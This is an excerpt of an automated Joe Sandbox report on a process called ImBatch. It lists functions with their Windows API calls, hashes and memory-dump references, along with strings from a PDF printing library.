Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 10802675

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: InfoStartup
String ID:
API String ID: 2571198056-0
Opcode ID: 4ea720ae085faab8f762895f84c0d4e0646fd2be18d3acf703c7086c503285a8
Instruction ID: 7664e403e1ac9fe74959b930f93a72735e5607b9504e83587e13dc67163ffbf8
Opcode Fuzzy Hash: 4ea720ae085faab8f762895f84c0d4e0646fd2be18d3acf703c7086c503285a8
Instruction Fuzzy Hash: D9D012E064934017D3511B248C9176A76C4DB45334F44462CFDE8853D1E3BE9995A7AB

Uniqueness

Uniqueness Score: -1.00%

Function 1080B668 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

Part of subcall function 1080B630: TlsGetValue.KERNEL32(0000002A), ref: 1080B648
Part of subcall function 1080B630: LocalFree.KERNEL32(00000000,0000002A), ref: 1080B652
Part of subcall function 1080B630: TlsSetValue.KERNEL32(0000002A,00000000,00000000,0000002A), ref: 1080B65F

TlsFree.KERNEL32(0000002A), ref: 1080B685

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: FreeValue$Local
String ID:
API String ID: 2930853931-0
Opcode ID: 25e17e35a6f52faa80c9deebaf3200dfa500a5b4d787d24747995fab5bd1e908
Instruction ID: 780a7bac47ad7d7d9da7f746a785559a7b08881d0ca698a57439529ae2ef398e
Opcode Fuzzy Hash: 25e17e35a6f52faa80c9deebaf3200dfa500a5b4d787d24747995fab5bd1e908
Instruction Fuzzy Hash: 19C08CB550A20282EB90AFFC8C81B016128DB143A0B424311E930D11E8E626D8838E50

Uniqueness

Uniqueness Score: -1.00%

Function 1090D668 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNEL32(00000000,10A65B02,00000000,10A65BB2,?,?,?,10A67A8A), ref: 1090D669

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 7f0580549430e6d6b00f18c9e7830acb24f548987757752a0debd59d4609ddcc
Instruction ID: 1f26d4ea90ddfae84c33bd3aa8f8d05c884f4406a83e8b96d4a53ef85af6fd9f
Opcode Fuzzy Hash: 7f0580549430e6d6b00f18c9e7830acb24f548987757752a0debd59d4609ddcc
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1080A404 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMON

Download Yara Rule

APIs

lstrcpynW.KERNEL32(?,00000000,?,00000000,1080A4A1,?,?,?,00000000), ref: 1080A46E

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: lstrcpyn
String ID:
API String ID: 97706510-0
Opcode ID: 17244625a3b56706029214468e8fd9cebaadcd61533cc6aee2fb9430305aba33
Instruction ID: 38fb7fa05a0d9debdac2330e0634b8e018a01d0077707e5e83192f14d2757e18
Opcode Fuzzy Hash: 17244625a3b56706029214468e8fd9cebaadcd61533cc6aee2fb9430305aba33
Instruction Fuzzy Hash: 4911027A808608EFDB10CB6CCC8AA9AB7E8EF05390F5142A5F84497254D7F0AD00C769

Uniqueness

Uniqueness Score: -1.00%

Function 10844630 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,10A4E694,10874FE4,10874FE4,?,108CACFC,108CD174,10874FE4,00000000,108CADED,?,10874FE4,10874FE4), ref: 1084464E

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4094c263874b0426091f95224d9179c142c515808b62cde5c8de92c15674b227
Instruction ID: 81b278507f00b65a03082e2dbced8813958d68f1f5cd1d774d170660ddcd468d
Opcode Fuzzy Hash: 4094c263874b0426091f95224d9179c142c515808b62cde5c8de92c15674b227
Instruction Fuzzy Hash: E01188742447099FD710DF1CC880B86B7E4EB9A350F21C53AE999CB388DB70E8018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10A02DC0 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,109F83CC,00000000,10A02D8C,109F83CC,00000001,10A0406F,00000000,?,10A5941C), ref: 10A02DCF

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: fcde6d69407efa88fbec63705a53e0bc5a433c49693aaba1398204313089363e
Instruction ID: e1096b2ed9e0d85fd56b8ef76e96f16620696f2ad67faa412042f7e5f6525bb7
Opcode Fuzzy Hash: fcde6d69407efa88fbec63705a53e0bc5a433c49693aaba1398204313089363e
Instruction Fuzzy Hash: 17010C746143958FDB14DFACD8D4B953BE5FB09348F0940B6E9088F366C7B1A8849B64

Uniqueness

Uniqueness Score: -1.00%

Function 10802A88 Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,10803097), ref: 10802A9E

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ca2ac45975d538b1df1d41c9aeec454e4b63b2d6eb19943014cfe20361fedf57
Instruction ID: c9928d5d40fd1afce845e7b71f1526787849d95387a79f4d5d7cd38249057caa
Opcode Fuzzy Hash: ca2ac45975d538b1df1d41c9aeec454e4b63b2d6eb19943014cfe20361fedf57
Instruction Fuzzy Hash: EAF03CB0B212104BDB68CFBC8E813117AD6E789644F50813EE509DBAA8EFB184028B00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10A65BC0 Relevance: 128.0, APIs: 2, Strings: 82, Instructions: 2044COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(10AE1038,?,10A67D9C,?), ref: 10A65CE0

Part of subcall function 10A65AC4: EnterCriticalSection.KERNEL32(10AE1020,00000000,10A65BB2,?,?,?,10A67A8A), ref: 10A65B14
Part of subcall function 10A65AC4: LeaveCriticalSection.KERNEL32(10AE1020,10A65B9C,10AE1020,00000000,10A65BB2,?,?,?,10A67A8A), ref: 10A65B8F

Strings

PROGRESSWND, xrefs: 10A66686
TITLE, xrefs: 10A67594
FOOTERL, xrefs: 10A676DD
PRINTERNAME, xrefs: 10A661AA
WRITEPRINTERBEFORE expects hex encoded data!, xrefs: 10A66B3A
PAPERWIDTH, xrefs: 10A671F3
TRAY1, xrefs: 10A673F1
WRITEPRINTERNEXTPAGE, xrefs: 10A66E9C
CHECKEXIST, xrefs: 10A65F58
RANGE, xrefs: 10A661D0
WRITEPRINTER expects hex encoded data!, xrefs: 10A66824
WRITEPRINTERBEFORESTART expects hex encoded data!, xrefs: 10A669AF
WRITEPRINTERNEXTPAGE expects hex encoded data!, xrefs: 10A6700B
PRINTER, xrefs: 10A66169, 10A66182, 10A66194
There are no printers visible to this application, xrefs: 10A66237
BUFFERED, xrefs: 10A670F7
HEADERC, xrefs: 10A6762D
QUIET, xrefs: 10A6660A
HEADER-C, xrefs: 10A677A2
STDGDI, xrefs: 10A66461
pdfPrint: PDF was not loaded, xrefs: 10A67A22
HEADERSIZE, xrefs: 10A675D1
LISTTRAY, xrefs: 10A665B6
FOOTERSIZE, xrefs: 10A676AB
STRETCH, xrefs: 10A6733D
HEADERL, xrefs: 10A67603
MEDIATYPE, xrefs: 10A66491
PAPERSIZE, xrefs: 10A6725D
OUTLINEFONTS, xrefs: 10A67471, 10A674BA
FOOTER-C, xrefs: 10A677E4
ADDPRINTER ", xrefs: 10A66095
PAPERBIN, xrefs: 10A67381
WRITEPRINTERFIRSTPAGE, xrefs: 10A66CF9
wPDFSDK - cannot locate printer ", xrefs: 10A662C8
DUPLEX, xrefs: 10A66656
MEMORY.PDF, xrefs: 10A65FDF, 10A679CE
wPDF-Printer , xrefs: 10A66536
TRAY2, xrefs: 10A673C2
EQUALXOFF, xrefs: 10A67292
pdfPrint: Loaded %d pages, xrefs: 10A67A73
COLLATE, xrefs: 10A664B8
pdfPrint: File not found , xrefs: 10A678D7, 10A67960
DIALOG, xrefs: 10A665E0
USEBITMAP, xrefs: 10A67164
OVERPAGE, xrefs: 10A67534
HEADFOOTTEST, xrefs: 10A6775D
HEADER-R [#]/[##], xrefs: 10A677B8
DEBUGMODE, xrefs: 10A65E95
PRINTRANGE, xrefs: 10A661BA
FOOTER-L, xrefs: 10A677CE
FOOTER-R, xrefs: 10A677FC
DONTSETDEVMODE, xrefs: 10A67503
HEADERFONT, xrefs: 10A675A7
WRITEPRINTERBEFORE, xrefs: 10A669CB
LISTPRINTER, xrefs: 10A664EC
WRITEPRINTERBEFORESTART, xrefs: 10A66840
WRITEPRINTERAFTER, xrefs: 10A66B56
WATERMARK, xrefs: 10A67564
MEMORYSIZE, xrefs: 10A65F7E
Switching to Printer , xrefs: 10A661F3
DISABLEAA, xrefs: 10A6703F
PAPERLENGTH, xrefs: 10A67228
WRITEPRINTERFIRSTPAGE expects hex encoded data!, xrefs: 10A66E68
FOOTERR, xrefs: 10A67731
FROM, xrefs: 10A670A3
HEADERR, xrefs: 10A67657
BUFFERRES, xrefs: 10A6711E
WRITEPRINTER, xrefs: 10A666B5
WRITEPRINTERAFTER expects hex encoded data!, xrefs: 10A66CC5
NO_OFFSET, xrefs: 10A672C5
Arial, xrefs: 10A67812
DONTWAIT, xrefs: 10A66630
ADDPRINTER, xrefs: 10A6601C
LOWQUALITY, xrefs: 10A671A9
FOOTERFONT, xrefs: 10A67681
FOOTERC, xrefs: 10A67707
COPIES, xrefs: 10A6643E
LOGFILE, xrefs: 10A65E82
Selected Printer is , xrefs: 10A6640A
JBIG2TOOL, xrefs: 10A67069, 10A67080
LIMITA3, xrefs: 10A672F8
HEADER-L, xrefs: 10A6778C

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID: ADDPRINTER$ADDPRINTER "$Arial$BUFFERED$BUFFERRES$CHECKEXIST$COLLATE$COPIES$DEBUGMODE$DIALOG$DISABLEAA$DONTSETDEVMODE$DONTWAIT$DUPLEX$EQUALXOFF$FOOTER-C$FOOTER-L$FOOTER-R$FOOTERC$FOOTERFONT$FOOTERL$FOOTERR$FOOTERSIZE$FROM$HEADER-C$HEADER-L$HEADER-R [#]/[##]$HEADERC$HEADERFONT$HEADERL$HEADERR$HEADERSIZE$HEADFOOTTEST$JBIG2TOOL$LIMITA3$LISTPRINTER$LISTTRAY$LOGFILE$LOWQUALITY$MEDIATYPE$MEMORY.PDF$MEMORYSIZE$NO_OFFSET$OUTLINEFONTS$OVERPAGE$PAPERBIN$PAPERLENGTH$PAPERSIZE$PAPERWIDTH$PRINTER$PRINTERNAME$PRINTRANGE$PROGRESSWND$QUIET$RANGE$STDGDI$STRETCH$Selected Printer is $Switching to Printer $TITLE$TRAY1$TRAY2$There are no printers visible to this application$USEBITMAP$WATERMARK$WRITEPRINTER$WRITEPRINTER expects hex encoded data!$WRITEPRINTERAFTER$WRITEPRINTERAFTER expects hex encoded data!$WRITEPRINTERBEFORE$WRITEPRINTERBEFORE expects hex encoded data!$WRITEPRINTERBEFORESTART$WRITEPRINTERBEFORESTART expects hex encoded data!$WRITEPRINTERFIRSTPAGE$WRITEPRINTERFIRSTPAGE expects hex encoded data!$WRITEPRINTERNEXTPAGE$WRITEPRINTERNEXTPAGE expects hex encoded data!$pdfPrint: File not found $pdfPrint: Loaded %d pages$pdfPrint: PDF was not loaded$wPDF-Printer $wPDFSDK - cannot locate printer "
API String ID: 2801635615-3506632881
Opcode ID: 8023bddbeda14f1b998fc9497291990af7bbcde1965e45ab86c21fcdc841a64b
Instruction ID: 8f34ef3e8e82ef4a089d8b3a281cec31a57a0f2340432e17c37b208ba42ddd9c
Opcode Fuzzy Hash: 8023bddbeda14f1b998fc9497291990af7bbcde1965e45ab86c21fcdc841a64b
Instruction Fuzzy Hash: 62132678A042698FDB10DBA8CC81BDEB7B5FF49300F5485A5E449AB354DB70AE86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10A39D78 Relevance: 70.8, APIs: 38, Strings: 2, Instructions: 789fileCOMMON

Download Yara Rule

APIs

SetAbortProc.GDI32(00000000,10A38D4C,00000000), ref: 10A39F41
SetAbortProc.GDI32(00000000,10A38D4C,00000000,10A38D4C,00000000), ref: 10A39F66
EndPage.GDI32(00000000), ref: 10A39F9B
StartPage.GDI32(00000000), ref: 10A39FB9
GetDeviceCaps.GDI32(00000000,00000058), ref: 10A3A028
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10A3A03F
GetDeviceCaps.GDI32(00000000,00000058), ref: 10A3A058
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10A3A06F
GetDeviceCaps.GDI32(00000000,00000058), ref: 10A3A0A1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10A3A0C2
GetDeviceCaps.GDI32(00000000,0000006E), ref: 10A3A0FA
GetDeviceCaps.GDI32(00000000,0000006F), ref: 10A3A112
GetDeviceCaps.GDI32(00000000,00000070), ref: 10A3A12A
GetDeviceCaps.GDI32(00000000,00000070), ref: 10A3A14D
GetDeviceCaps.GDI32(00000000,00000071), ref: 10A3A16C
GetDeviceCaps.GDI32(00000000,00000008), ref: 10A3A188
GetDeviceCaps.GDI32(00000000,00000070), ref: 10A3A19E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 10A3A1BB
GetDeviceCaps.GDI32(00000000,00000071), ref: 10A3A1D1
SaveDC.GDI32(00000000), ref: 10A3A20E
SetMapMode.GDI32(00000000,00000001), ref: 10A3A239
MulDiv.KERNEL32(10A3B779,00000000,00000048), ref: 10A3A242
MulDiv.KERNEL32(10A3B779,00000000,00000048), ref: 10A3A250
GetDeviceCaps.GDI32(00000000,00000058), ref: 10A3A37A
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10A3A392
PlayEnhMetaFile.GDI32(00000000,?,00000000), ref: 10A3A3C7
MulDiv.KERNEL32(10A3B779,00000078,00000048), ref: 10A3A461
MulDiv.KERNEL32(10A3B779,00000078,00000048), ref: 10A3A478
MulDiv.KERNEL32(10A3B779,000000C8,00000048), ref: 10A3A4AF
MulDiv.KERNEL32(10A3B779,000000C8,00000048), ref: 10A3A4C8
GetDeviceCaps.GDI32(00000000,00000058), ref: 10A3A4E7
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10A3A4FF
PlayEnhMetaFile.GDI32(00000000,?,?), ref: 10A3A5AE
GetDeviceCaps.GDI32(?,0000005A), ref: 10A3A61F
GetDeviceCaps.GDI32(?,00000008), ref: 10A3A62F
GetDeviceCaps.GDI32(?,0000000A), ref: 10A3A63B

Strings

Printing not allowed!, xrefs: 10A39DD8
Page , xrefs: 10A39E36

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
